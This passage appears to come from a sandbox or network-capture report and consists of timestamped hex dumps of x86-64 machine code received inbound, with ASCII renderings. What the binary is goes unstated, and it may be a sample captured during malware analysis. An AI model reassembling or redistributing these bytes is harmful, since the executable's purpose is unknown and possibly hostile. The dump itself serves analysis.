8b 74 24 58 48 83 c4 30 5f c3 48 85 c9 74 eb 0f b7 51 08 41 b8 02 02 00 00 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 80 79 0a 01 75 06 48 8b 59 10 eb 0f Data Ascii: HT$`HL$07tL$`H$HL$pH3{HHt$ WH0HHIIA?rH\$HtPu;HHt.HEu!H$HfAHfAH\$HHt$XH0_HtQAfA#fA;uyuHY
2023-11-18 09:02:42 UTC	8798	IN	Data Raw: 44 38 30 74 5f 48 8b 5c 24 60 e9 f2 f9 ff ff 48 85 f6 74 07 4c 8b b6 f8 00 00 00 49 8b d6 48 8d 0d 1c 13 15 00 e8 77 fa 12 00 48 8b ce 48 8b d8 e8 8c ee 0f 00 48 8b 44 24 50 41 b1 01 4d 8b c7 4c 89 7c 24 20 48 8b d3 48 8b 08 c7 40 24 01 00 00 00 e8 7a 7b 10 00 48 8b cb e8 b2 29 13 00 e9 eb 01 00 00 4c 8b 64 24 50 48 8d 55 f0 48 8d 4c 24 70 e8 2a 04 00 00 49 8b 1c 24 48 8b 4b 28 48 85 c9 0f 84 37 01 00 00 8b 81 88 00 00 00 e9 31 01 00 00 48 8b cb e8 26 51 07 00 48 8b 54 24 48 48 8d 0d 7a 12 15 00 4c 8b c0 e8 f2 f9 12 00 48 8b 4c 24 40 48 8b f8 e8 05 ee 0f 00 48 8b 44 24 50 41 bd 01 00 00 00 48 8b 18 44 89 68 24 48 85 ff 75 32 b8 00 24 00 00 66 85 43 08 74 15 48 8b cb e8 1b 88 10 00 48 8b cf e8 23 29 13 00 e9 5c 01 00 00 48 8b cf 66 44 89 6b 08 e8 11 29 13 Data Ascii: D80t_H\$`HtLIHwHHHD$PAML\|$ HH@$z{H)Ld$PHUHL$p*I$HK(H71H&QHT$HHzLHL$@HHD$PAHDh$Hu2$fCtHH#)\HfDk)
2023-11-18 09:02:42 UTC	8803	IN	Data Raw: 6e 44 33 75 77 03 c7 44 33 75 97 03 c8 44 03 c9 d1 c6 41 8b c1 41 d1 c6 c1 c0 05 8b ca 41 33 c8 05 a1 eb d9 6e 41 33 cb 41 c1 c8 02 03 c6 45 8b fd 03 c8 44 33 ff 44 33 7d a3 44 03 d1 44 33 7d 87 8b ca 41 33 c9 41 d1 c7 41 33 c8 41 c1 c9 02 41 8b c2 c1 c0 05 05 a1 eb d9 6e 41 03 c6 03 c8 44 03 d9 41 8b ca 41 33 c9 41 8b c3 c1 c0 05 41 33 c8 05 a1 eb d9 6e 41 03 c7 03 c8 03 d1 8b 45 7f 33 c6 41 c1 ca 02 33 04 24 41 8b ca 33 45 77 41 33 c9 d1 c0 41 33 cb 89 45 83 8b c2 44 8b 6d 83 41 81 c5 a1 eb d9 6e c1 c0 05 41 03 c5 41 c1 cb 02 03 c8 44 8b 6d 8b 45 33 ee 44 03 c1 44 33 6c 24 04 41 8b c0 44 33 6d a3 8b ca 41 d1 c5 41 33 ca c1 c0 05 41 33 cb 44 89 6d 87 41 81 c5 a1 eb d9 6e 41 03 c5 c1 ca 02 03 c8 41 8b c7 44 03 c9 41 33 c4 33 45 9b 8b ca 33 04 24 41 33 c8 Data Ascii: nD3uwD3uDAAA3nA3AED3D3}DD3}A3AA3AAnADAA3AA3nAE3A3$A3EwA3A3EDmAnAADmE3DD3l$AD3mAA3A3DmAnAADA33E3$A3
2023-11-18 09:02:42 UTC	8807	IN	Data Raw: 00 00 85 ed 0f 85 a7 00 00 00 48 8b d7 41 b8 01 00 00 00 0f 1f 40 00 48 8b 43 18 41 80 3c 00 01 75 7a 48 8b 43 20 42 8b 0c 80 83 f9 7f 77 0b 88 4c 1a 30 b8 01 00 00 00 eb 50 81 f9 ff 0f 00 00 77 15 8b c1 c1 e8 06 0c c0 88 44 13 30 48 ff c2 b8 02 00 00 00 eb 29 81 f9 ff ff 00 00 77 3d 8b c1 c1 e8 0c 0c d0 88 44 13 30 8b c1 c1 e8 06 24 3f 0c 80 88 44 13 31 48 83 c2 02 b8 03 00 00 00 80 e1 3f 80 c9 80 88 4c 13 30 48 ff c2 49 ff c0 03 f8 48 83 fa 0a 0f 8c 7b ff ff ff 85 ff 7e 0e 8d 4f ff 48 63 c1 80 7c 18 30 00 0f 44 f9 89 7b 3c 48 8b 43 10 e9 67 fe ff ff 48 8b cb e8 15 00 00 00 48 8d 05 26 f1 14 00 e9 53 fe ff ff cc cc cc cc cc cc cc cc cc 48 85 c9 74 27 53 48 83 ec 20 48 8b d9 48 8b 49 18 e8 1a 08 13 00 48 8b 4b 20 e8 11 08 13 00 48 8b cb e8 09 08 13 00 48 Data Ascii: HA@HCA<uzHC BwL0PwD0H)w=D0$?D1H?L0HIH{~OHc\|0D{<HCgHH&SHt'SH HHIHK HH
2023-11-18 09:02:42 UTC	8811	IN	Data Raw: e8 ad 03 00 00 85 c0 0f 85 67 02 00 00 85 ed 0f 84 5f 02 00 00 41 8d 53 01 48 8b ce e8 21 06 00 00 e9 4e 02 00 00 8b 4c 24 38 e8 c3 03 00 00 8b cd 44 8b c0 e8 b9 03 00 00 41 3b c0 0f 84 32 02 00 00 45 8b 07 45 8d 4b 01 41 8b d4 45 85 c0 74 17 90 8b c2 0f b7 0c 43 41 3b c9 0f 84 13 02 00 00 ff c2 41 3b d0 72 ea 41 8d 40 01 66 46 89 0c 43 41 89 07 e9 fb 01 00 00 44 8b 06 41 8b d4 45 85 c0 74 21 4c 8b 4e 08 66 66 0f 1f 84 00 00 00 00 00 8b c2 41 0f b7 0c 41 41 3b cb 74 16 ff c2 41 3b d0 72 ed 48 8b 46 08 66 46 89 1c 40 41 8d 40 01 89 06 45 8b 07 45 8d 4b 01 41 8b d4 45 85 c0 74 26 4d 8b 57 08 66 66 66 0f 1f 84 00 00 00 00 00 8b c2 41 0f b7 0c 42 41 3b c9 0f 84 92 01 00 00 ff c2 41 3b d0 72 e9 49 8b 47 08 66 46 89 0c 40 41 8d 40 01 41 89 07 e9 76 01 00 00 49 Data Ascii: g_ASH!NL$8DA;2EEKAEtCA;A;rA@fFCADAEt!LNffAAA;tA;rHFfF@A@EEKAEt&MWfffABA;A;rIGfF@A@AvI
2023-11-18 09:02:42 UTC	8815	IN	Data Raw: 60 e8 a7 a8 0f 00 48 8b f0 48 85 c0 0f 84 44 01 00 00 49 8b 4f 08 e8 32 aa 0f 00 48 63 e8 48 8d 4d 01 e8 26 e9 12 00 48 89 43 28 48 85 c0 74 b2 4c 8d 45 01 48 8b d6 48 8b c8 e8 5e 37 fe ff 80 3e 24 75 27 4c 8b 43 28 48 8d 44 24 60 49 ff c0 48 89 44 24 20 45 33 c9 48 8d 4b 30 33 d2 e8 da 2f 00 00 48 8b 74 24 60 48 8b f8 48 85 f6 74 5a 48 8b 0b 48 8b 49 10 e8 81 e7 12 00 48 8b d6 48 8d 0d 07 cc 14 00 e8 02 b8 12 00 48 8b 0b 48 89 41 10 48 8b cb e8 03 09 00 00 48 8b 03 bf 07 00 00 00 ba 01 00 00 00 4c 39 60 10 0f 45 fa 8b c7 48 8b 7c 24 70 48 8b 74 24 68 4c 8b 7c 24 30 48 83 c4 38 41 5e 41 5c 5d 5b c3 48 85 ff 75 08 33 c0 eb dd 48 8b 7b 38 48 8b cf 48 2b 4b 38 48 c1 f9 04 89 4b 10 89 4b 0c 0f b6 07 88 43 18 3c 06 72 5e 44 89 67 08 44 8b 43 10 41 8d 48 01 03 Data Ascii: `HHDIO2HcHM&HC(HtLEHH^7>$u'LC(HD$`IHD$ E3HK03/Ht$`HHtZHHIHHHHAHHL9`EH\|$pHt$hL\|$0H8A^A\][Hu3H{8HH+K8HKKC<r^DgDCAH
2023-11-18 09:02:42 UTC	8819	IN	Data Raw: 75 10 48 8b 43 18 48 8b 4b 08 c6 04 01 5d 48 ff 43 18 0f b6 43 21 84 c0 74 15 3c 01 0f 85 22 01 00 00 48 8b cf e8 ce 8d 0f 00 e9 15 01 00 00 4c 63 43 18 48 83 c9 ff 48 8b 53 08 41 b1 01 85 f6 74 44 80 7b 20 00 48 8d 05 2b d7 12 00 48 0f 45 c1 48 8b 0f 48 89 44 24 20 e8 da 28 10 00 85 c0 74 1b 48 8b cf 83 f8 12 75 0e e8 19 8e 0f 00 c6 43 20 01 e9 cc 00 00 00 e8 7b 8d 0f 00 c6 43 20 01 e9 be 00 00 00 48 89 4c 24 20 48 8b 0f e8 a5 28 10 00 85 c0 74 1b 48 8b cf 83 f8 12 75 0e e8 e4 8d 0f 00 48 ff 4b 18 e9 97 00 00 00 e8 46 8d 0f 00 48 ff 4b 18 e9 89 00 00 00 48 8b 1f 48 8b 43 28 48 85 c0 74 08 8b b0 88 00 00 00 eb 09 be 00 ca 9a 3b 0f 1f 40 00 b8 00 24 00 00 66 85 43 08 75 06 83 7b 20 00 74 08 48 8b cb e8 97 34 10 00 48 c7 43 30 00 00 00 00 48 8d 05 c0 bb 14 Data Ascii: uHCHK]HCC!t<"HLcCHHSAtD{ H+HEHHD$ (tHuC {C HL$ H(tHuHKFHKHHC(Ht;@$fCu{ tH4HC0H
2023-11-18 09:02:42 UTC	8823	IN	Data Raw: 00 00 48 8b 4d 17 48 33 cc e8 85 07 fe ff 48 81 c4 e0 00 00 00 41 5f 41 5e 5e 5b 5d c3 cc cc cc cc cc cc 48 89 5c 24 08 48 89 74 24 10 48 89 7c 24 18 4c 89 74 24 20 55 48 8b ec 48 81 ec 80 00 00 00 48 8b d9 33 f6 49 8b 08 49 8b f8 41 be 02 02 00 00 48 85 c9 75 04 8b c6 eb 2e 0f b7 51 08 0f b7 c2 66 41 23 c6 66 41 3b c6 75 0c 80 79 0a 01 75 06 48 8b 41 10 eb 11 f6 c2 01 74 05 48 8b c6 eb 07 b2 01 e8 d9 15 10 00 33 c9 48 89 4d a0 48 89 4d a8 48 89 4d b0 48 89 4d b8 48 89 4d c0 48 89 4d c8 48 85 c0 0f 84 08 01 00 00 4c 8b c0 48 8d 4d a0 48 8b d3 e8 17 18 00 00 85 c0 0f 85 f1 00 00 00 48 8b 4f 08 48 85 c9 75 05 48 8b c6 eb 2e 0f b7 51 08 0f b7 c2 66 41 23 c6 66 41 3b c6 75 0c 80 79 0a 01 75 06 48 8b 41 10 eb 11 f6 c2 01 74 05 48 8b c6 eb 07 b2 01 e8 63 15 10 Data Ascii: HMH3HA_A^^[]H\$Ht$H\|$Lt$ UHHH3IIAHu.QfA#fA;uyuHAtH3HMHMHMHMHMHMHLHMHHOHuH.QfA#fA;uyuHAtHc
2023-11-18 09:02:42 UTC	8826	IN	Data Raw: 28 0f b6 04 28 84 c0 74 0e 3c 07 75 0e 48 8b cb e8 b1 ff ff ff eb 04 80 4b 01 04 80 3b 06 72 08 8b 43 04 83 c0 02 eb 05 b8 02 00 00 00 03 f8 3b fe 7e c3 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 30 48 8b f9 48 8d 0d dc 9e 14 00 e8 b7 8a 12 00 48 8b 0f 41 b1 01 49 83 c8 ff c7 47 24 01 00 00 00 48 8b d0 48 c7 44 24 20 ff ff ff ff 48 8b d8 e8 c2 0b 10 00 48 8b cb 48 8b 5c 24 40 48 83 c4 30 5f e9 f0 b9 12 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 30 80 3a 24 49 8b d9 4d 8b c8 48 c7 44 24 48 00 00 00 00 48 8b f9 75 1f 4c 8d 42 01 33 d2 48 8d 44 24 48 48 89 44 24 20 e8 ea 01 00 00 48 8b 54 24 48 48 85 d2 74 58 fe 47 21 48 8d 0d 26 9e 14 Data Ascii: ((t<uHK;rC;~H\$0Hl$8Ht$@H _H\$WH0HHHAIG$HHD$ HHH\$@H0_H\$WH0:$IMHD$HHuLB3HD$HHD$ HT$HHtXG!H&
2023-11-18 09:02:42 UTC	8830	IN	Data Raw: 00 48 c1 e1 04 33 d2 48 89 4c 24 40 48 89 54 01 08 0f b6 0c 1e 42 80 bc 09 40 e2 16 00 00 74 04 ff c6 eb ed 66 ff 47 22 66 39 6f 22 0f 87 fa fd ff ff 8b d6 48 8b cf e8 45 fd ff ff b9 ff ff 00 00 66 01 4f 22 85 c0 78 76 8b f0 4c 8d 0d 6f d8 fd ff 8b c0 0f b6 0c 18 42 80 bc 09 40 e2 16 00 00 74 1f 0f 1f 40 00 66 66 0f 1f 84 00 00 00 00 00 ff c6 0f b6 0c 1e 42 80 bc 09 40 e2 16 00 00 75 ef 8b c6 0f b6 0c 18 80 f9 2c 75 04 ff c6 eb 80 80 f9 5d 0f 85 92 fd ff ff 8b 0f 48 8b 47 08 48 8b 54 24 40 2b 4c 24 48 ff c9 89 4c 02 04 8d 46 01 48 8b 74 24 50 48 83 c4 20 5f 5d 5b c3 83 f8 fd e9 a9 fe ff ff 80 f9 22 0f 85 f9 00 00 00 32 d2 8d 75 01 0f b6 0c 1e 88 54 24 48 f6 c1 e0 0f 84 46 fd ff ff 41 b9 41 04 44 01 0f 1f 44 00 00 80 f9 5c 75 45 ff c6 0f b6 0c 1e 48 8d 14 Data Ascii: H3HL$@HTB@tfG"f9o"HEfO"xvLoB@t@ffB@u,u]HGHT$@+L$HLFHt$PH _]["2uT$HFAADD\uEH
2023-11-18 09:02:42 UTC	8835	IN	Data Raw: 08 57 48 83 ec 20 48 8b d9 48 8b 49 08 e8 7a 99 12 00 48 8b 4b 18 33 ff 48 89 7b 08 48 89 3b e8 68 99 12 00 48 89 7b 18 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc 80 39 06 72 06 8b 41 04 ff c0 c3 b8 01 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 30 48 8b d9 48 8d 05 1c 99 12 00 48 83 c9 ff 80 7b 20 00 48 8b 53 08 48 8b 3b 48 0f 45 c1 48 8b 4b 18 48 81 f9 ff ff ff 7f 76 15 48 83 f8 ff 74 05 48 8b ca ff d0 48 8b cf e8 f9 4f 0f 00 eb 24 4c 63 c1 41 b1 01 48 8b 0f 48 89 44 24 20 e8 94 ea 0f 00 85 c0 74 0d 48 8b cf 83 f8 12 74 da e8 43 4f 0f 00 48 8d 43 22 48 c7 43 10 64 00 00 00 48 89 43 08 48 c7 43 18 00 00 00 00 c6 43 20 01 48 8b 5c 24 40 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c Data Ascii: WH HHIzHK3H{H;hH{H\$0H _9rAH\$WH0HHH{ HSH;HEHKHvHtHHO$LcAHHD$ tHtCOHC"HCdHCHCC H\$@H0_H\
2023-11-18 09:02:42 UTC	8839	IN	Data Raw: ff c1 41 89 4c 24 40 3b ce 7c ec 41 be 0b 01 00 00 48 89 5c 24 48 4c 89 7c 24 38 45 39 69 38 75 07 41 39 74 24 40 7c 14 49 8b 54 24 20 44 38 6a 14 74 72 41 c7 44 24 18 01 00 00 00 85 ff 75 48 41 83 7c 24 18 00 75 40 48 8b 45 40 83 78 38 00 75 36 41 39 74 24 40 7d 2b 49 8b 54 24 50 66 0f 1f 84 00 00 00 00 00 49 63 4c 24 40 48 83 3c ca 00 75 0c 8d 41 01 41 89 44 24 40 3b c6 7c e8 41 39 74 24 40 41 0f 44 fe 8b c7 48 8b 5c 24 48 4c 8b 7c 24 38 4c 8b 74 24 40 48 83 c4 50 41 5d 41 5c 5f 5e 5d c3 48 8b 42 58 41 8b 5c 24 30 0f b7 48 04 48 6b c1 78 48 8b 8c 10 b8 00 00 00 8b b4 10 c0 00 00 00 ff ce 48 85 c9 4c 8d 71 01 4d 0f 44 f5 85 db 78 2e 49 8b 4c 24 38 8b c3 3b f3 49 8b d6 0f 4c c6 4c 63 c0 e8 2a 43 ff ff 85 c0 78 06 75 11 3b de 7d 0d 41 c7 44 24 18 01 00 00 Data Ascii: AL$@;\|AH\$HL\|$8E9i8uA9t$@\|IT$ D8jtrAD$uHA\|$u@HE@x8u6A9t$@}+IT$PfIcL$@H<uAAD$@;\|A9t$@ADH\$HL\|$8Lt$@HPA]A\_^]HBXA\$0HHkxHHLqMDx.IL$8;ILLc*Cxu;}AD$
2023-11-18 09:02:42 UTC	8843	IN	Data Raw: 8b c7 4c 2b cf 41 0f b6 08 43 0f b6 04 01 3b c8 75 1a 85 c9 75 24 48 8b cf 41 c7 06 01 00 00 00 e8 5d 78 12 00 8b c5 e9 85 00 00 00 42 0f b6 14 10 42 0f b6 0c 11 3b ca 75 05 49 ff c0 eb c6 4c 8d 0d 04 5b 14 00 4c 8b c7 4c 2b cf 66 0f 1f 44 00 00 41 0f b6 08 43 0f b6 04 01 3b c8 75 17 85 c9 75 21 48 8b cf 41 c7 06 02 00 00 00 e8 10 78 12 00 8b c5 eb 3b 42 0f b6 14 10 42 0f b6 0c 11 3b ca 75 05 49 ff c0 eb c9 48 8b d7 48 8d 0d c7 5a 14 00 e8 7a 48 12 00 48 8b cf 49 89 07 bd 01 00 00 00 e8 da 77 12 00 8b c5 eb 05 b8 07 00 00 00 48 8b 5c 24 40 48 8b 6c 24 48 48 8b 74 24 50 48 83 c4 20 41 5f 41 5e 5f c3 cc cc cc cc cc cc cc cc 81 f9 00 40 00 00 73 06 b8 02 00 00 00 c3 81 f9 00 00 20 00 73 06 b8 03 00 00 00 c3 81 f9 00 00 00 10 1b c0 83 c0 05 c3 cc cc cc cc cc Data Ascii: L+AC;uu$HA]xBB;uIL[LL+fDAC;uu!HAx;BB;uIHHZzHHIwH\$@Hl$HHt$PH A_A^_@s s
2023-11-18 09:02:42 UTC	8847	IN	Data Raw: 24 78 49 8b d9 48 89 54 24 30 48 8b d1 48 89 44 24 38 4c 89 7c 24 70 48 89 4c 24 40 44 0f b6 03 4c 8d 0d 26 65 14 00 44 8b e3 48 ff c3 45 2b e5 41 81 f8 c0 00 00 00 72 62 41 8d 80 40 ff ff ff 46 0f b6 04 08 8b c8 48 3b de 74 22 90 0f b6 0b 0f b6 c1 24 c0 3c 80 75 15 41 c1 e0 06 48 ff c3 0f b6 c9 83 e1 3f 44 03 c1 48 3b de 75 df 41 81 f8 80 00 00 00 72 1c 41 8b c0 25 00 f8 ff ff 3d 00 d8 00 00 74 0d 41 8b c0 83 e0 fe 3d fe ff 00 00 75 08 41 b8 fd ff 00 00 eb 09 45 85 c0 0f 84 7b 03 00 00 4c 8b fb 48 3b de 0f 83 6f 03 00 00 8b 2a 85 ed 74 14 33 d2 41 8b c8 e8 9d f8 ff ff 44 8b c0 4c 8d 0d 83 64 14 00 41 81 f8 80 00 00 00 73 0f 44 88 44 24 48 48 8d 7c 24 49 e9 9a 00 00 00 41 8b c0 41 81 f8 00 08 00 00 73 1f c1 e8 06 48 8d 7c 24 4a 24 1f 41 80 e0 3f 2c 40 41 Data Ascii: $xIHT$0HHD$8L\|$pHL$@DL&eDHE+ArbA@FH;t"$<uAH?DH;uArA%=tA=uAE{LH;o*t3ADLdAsDD$HH\|$IAAsH\|$J$A?,@A
2023-11-18 09:02:42 UTC	8851	IN	Data Raw: 14 00 88 47 02 8d 43 ff e9 f6 01 00 00 83 fb 05 7e 3c 8b 05 88 39 14 00 8d 53 fb 48 63 fa 48 03 f9 3b 07 75 29 0f b6 05 78 39 14 00 3a 47 04 75 1d 45 33 c0 e8 af 08 00 00 85 c0 0f 84 c4 01 00 00 b8 61 6c 00 00 66 89 07 e9 b2 01 00 00 83 fb 07 0f 8e ae 01 00 00 8b 05 4b 39 14 00 8d 53 f9 48 63 fa 48 03 f9 3b 07 75 45 0f b7 05 3b 39 14 00 66 3b 47 04 75 38 0f b6 05 30 39 14 00 3a 47 06 75 2c 45 33 c0 e8 5d 08 00 00 85 c0 0f 84 72 01 00 00 0f b7 05 86 00 14 00 66 89 07 0f b6 05 7e 00 14 00 88 47 02 8d 43 fc e9 54 01 00 00 8b 05 fb 38 14 00 3b 07 75 45 0f b7 05 f4 38 14 00 66 3b 47 04 75 38 0f b6 05 e9 38 14 00 3a 47 06 75 2c 45 33 c0 e8 0e 08 00 00 85 c0 0f 84 23 01 00 00 0f b7 05 47 00 14 00 66 89 07 0f b6 05 3f 00 14 00 88 47 02 8d 43 fc e9 05 01 00 00 8b Data Ascii: GC~<9SHcH;u)x9:GuE3alfK9SHcH;uE;9f;Gu809:Gu,E3]rf~GCT8;uE8f;Gu88:Gu,E3#Gf?GC
2023-11-18 09:02:42 UTC	8855	IN	Data Raw: 90 00 00 00 33 db 44 8b d2 48 8b f9 45 85 c0 7e 3f 41 83 e8 01 4c 8b 99 98 00 00 00 44 8b cb 78 2f 66 90 43 8d 04 08 99 2b c2 d1 f8 48 63 c8 41 8b 14 8b 44 3b d2 74 13 7e 06 44 8d 48 01 eb 04 44 8d 40 ff 45 3b c1 7d da eb 05 bb 01 00 00 00 41 8b ca e8 6b d3 ff ff 48 63 c8 0f b6 84 39 a0 00 00 00 33 c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 41 54 41 56 41 57 48 83 ec 30 4d 63 f8 4d 8b e1 4c 8b f2 41 f6 c7 01 74 10 b8 01 00 00 00 48 83 c4 30 41 5f 41 5e 41 5c c3 48 89 5c 24 50 48 89 6c 24 58 48 89 74 24 68 48 89 7c 24 28 4c 89 6c 24 20 e8 09 a7 06 00 33 f6 85 c0 0f 85 a9 03 00 00 b9 c0 00 00 00 e8 e5 47 12 00 48 8b e8 48 85 c0 0f 84 93 03 00 00 33 d2 48 8d 1d 48 27 14 00 41 b8 c0 00 00 00 48 8b c8 e8 d2 9d Data Ascii: 3DHE~?ALDx/fC+HcAD;t~DHD@E;}AkHc93H\$0H _ATAVAWH0McMLAtH0A_A^A\H\$PHl$XHt$hH\|$(Ll$ 3GHH3HH'AH
2023-11-18 09:02:42 UTC	8858	IN	Data Raw: 62 3c 12 00 48 8b d8 48 85 c0 75 17 49 89 04 24 8d 43 07 48 8b 5c 24 50 48 83 c4 28 41 5f 41 5c 5e 5d c3 4c 89 6c 24 68 33 d2 41 b8 80 00 00 00 4c 89 74 24 20 48 8b cb e8 39 92 fd ff 0f 28 05 72 c7 16 00 4c 8d 2d fb 68 fd ff 0f 11 03 45 33 f6 48 89 7c 24 58 0f 28 0d 69 c7 16 00 0f 11 4b 10 0f 28 05 6e c7 16 00 0f 11 43 20 0f 28 0d 73 c7 16 00 0f 11 4b 30 0f 28 05 78 c7 16 00 0f 11 43 40 0f 28 0d 7d c7 16 00 0f 11 4b 50 0f 28 05 82 c7 16 00 0f 11 43 60 0f 28 0d 87 c7 16 00 0f 11 4b 70 0f 1f 00 45 3b f7 0f 8d ea 00 00 00 4c 8b 06 48 8b 46 08 4d 85 c0 0f 84 c3 00 00 00 49 8b f8 4d 8d 9d 78 b2 16 00 48 f7 df 4d 8b c8 4c 03 df 0f 1f 40 00 45 0f b6 11 43 0f b6 0c 0b 44 3b d1 75 2b 45 85 d2 75 3c 44 38 10 0f 84 95 00 00 00 0f 1f 40 00 0f b6 08 84 c9 78 08 48 0f Data Ascii: b<HHuI$CH\$PH(A_A\^]Ll$h3ALt$ H9(rL-hE3H\|$X(iK(nC (sK0(xC@(}KP(C`(KpE;LHFMIMxHML@ECD;u+Eu<D8@xH
2023-11-18 09:02:42 UTC	8862	IN	Data Raw: 40 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 4c 89 40 18 48 89 50 10 55 56 48 83 ec 78 48 89 58 08 33 ed 48 89 78 e8 33 f6 49 8b d8 4c 89 68 d8 48 8b fa 4c 8b 29 4c 89 70 d0 4c 8b f1 48 89 68 b8 48 89 68 c0 48 89 48 a8 39 71 10 75 1b 4c 8b 41 20 48 8d 51 18 48 8b 49 08 e8 6d 7f 00 00 8b f0 41 c7 46 10 01 00 00 00 85 f6 75 10 49 8b 4e 08 4c 8b c3 33 d2 e8 51 8b 00 00 8b f0 33 d2 89 54 24 38 85 f6 0f 85 13 02 00 00 4c 89 64 24 68 41 b9 02 02 00 00 44 8b 64 24 4c 41 ba 00 40 00 00 4c 89 7c 24 50 44 8b 7c 24 48 90 41 3b 55 18 0f 8d c7 01 00 00 c7 44 24 3c 00 00 00 00 49 8b 45 28 48 63 ca 80 3c 01 00 0f 85 ce 00 00 00 8d 42 02 48 63 c8 48 8b 0c cf 48 85 c9 75 04 33 db eb 3d 44 0f b7 41 08 41 0f b7 c0 66 41 23 c1 66 41 3b c1 75 0c 80 79 0a 01 75 Data Ascii: @_HL@HPUVHxHX3Hx3ILhHL)LpLHhHhHH9quLA HQHImAFuINL3Q3T$8Ld$hADd$LA@L\|$PD\|$HA;UD$<IE(Hc<BHcHHu3=DAAfA#fA;uyu
2023-11-18 09:02:42 UTC	8867	IN	Data Raw: 02 02 00 00 0f 1f 84 00 00 00 00 00 41 3b 7d 18 0f 8f 67 01 00 00 49 8b 45 28 80 7c 28 ff 00 0f 85 0d 01 00 00 48 85 f6 74 1c 8b d7 48 8b ce e8 18 c2 0e 00 8b d7 48 8b ce 48 8b d8 e8 3b c5 0e 00 e9 87 00 00 00 4d 85 e4 0f 84 e3 00 00 00 4b 8b 0c 26 48 85 c9 75 04 33 db eb 35 0f b7 51 08 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 80 79 0a 01 75 06 48 8b 59 10 eb 13 f6 c2 01 74 04 33 db eb 0a b2 01 e8 73 68 0f 00 48 8b d8 ba 00 40 00 00 4b 8b 04 26 0f b7 48 08 f6 c1 02 74 0b 80 78 0a 01 75 05 8b 48 0c eb 26 f6 c1 10 74 0c 66 85 ca 8b 48 0c 74 19 03 08 eb 15 f6 c1 01 74 04 33 c9 eb 0c b2 01 48 8b c8 e8 3f 54 0f 00 8b c8 33 d2 89 54 24 3c 48 85 db 74 2f 49 8b 45 70 48 8d 15 b7 00 00 00 48 89 54 24 28 4c 8b cb 89 4c 24 20 48 8d 54 24 30 49 8b 4d 68 41 b8 04 00 00 Data Ascii: A;}gIE(\|(HtHHH;MK&Hu35QfA#fA;uyuHYt3shH@K&HtxuH&tfHtt3H?T3T$<Ht/IEpHHT$(LL$ HT$0IMhA
2023-11-18 09:02:42 UTC	8871	IN	Data Raw: 13 00 0f 11 49 30 0f 10 05 1a e6 13 00 0f 11 41 40 f2 0f 10 0d 1e e6 13 00 f2 0f 11 49 50 0f b7 05 1a e6 13 00 66 89 41 58 0f b6 05 11 e6 13 00 88 41 5a b8 02 02 00 00 66 89 43 08 c7 43 0c 5a 00 00 00 c6 43 0a 01 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b 41 08 b9 bf c3 00 00 49 8b 18 48 8b 78 08 0f b7 43 08 66 23 c1 b9 01 82 00 00 66 3b c1 75 25 80 7b 0b 70 75 1f 48 8b 0b 48 8d 15 2d e5 13 00 e8 e0 47 12 00 85 c0 75 0c 48 8b 43 10 48 85 c0 74 03 48 89 38 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 56 48 83 ec 20 48 89 5c 24 30 48 8b f1 48 8b 59 30 48 8b 0d 77 cb 16 00 48 89 7c 24 38 48 85 db 74 7d 48 8b 43 20 48 Data Ascii: I0A@IPfAXAZfCCZCH\$0H _H\$WH HAIHxCf#f;u%{puHH-GuHCHtH8H\$0H _@VH H\$0HHY0HwH\|$8Ht}HC H
2023-11-18 09:02:42 UTC	8875	IN	Data Raw: 00 00 48 39 50 18 74 09 48 8b 40 08 48 85 c0 75 f1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 48 8b 44 24 60 4c 8b d1 48 89 8a 90 00 00 00 48 8b da 48 8d 0d 61 49 14 00 48 89 44 24 20 41 ff 52 18 48 c7 83 90 00 00 00 00 00 00 00 48 83 c4 30 5b c3 cc cc cc cc cc cc cc 48 89 5c 24 18 48 89 6c 24 20 56 41 54 41 55 41 56 41 57 48 83 ec 20 4c 8b 39 44 8b ea 4c 8b e1 48 8d 54 24 50 33 c0 49 8b cf 49 8b e9 48 89 44 24 50 4d 8b f0 e8 96 30 00 00 48 8b 74 24 50 8b d8 85 c0 0f 85 b2 00 00 00 c7 46 20 01 00 00 00 4c 8d 46 40 48 b8 00 00 00 00 00 00 00 80 48 89 7c 24 58 48 89 46 28 41 8b d5 48 b8 ff ff ff ff ff ff ff 7f 48 89 46 30 4c 89 3e 49 8b 4c 24 40 e8 8b 1b 01 00 8b d8 85 c0 75 6b 48 8b 7e 40 45 33 c9 4c 8b 46 28 48 8b cf 49 8b 57 20 Data Ascii: H9PtH@Hu@SH0HD$`LHHHaIHD$ ARHH0[H\$Hl$ VATAUAVAWH L9DLHT$P3IIHD$PM0Ht$PF LF@HH\|$XHF(AHHF0L>IL$@ukH~@E3LF(HIW
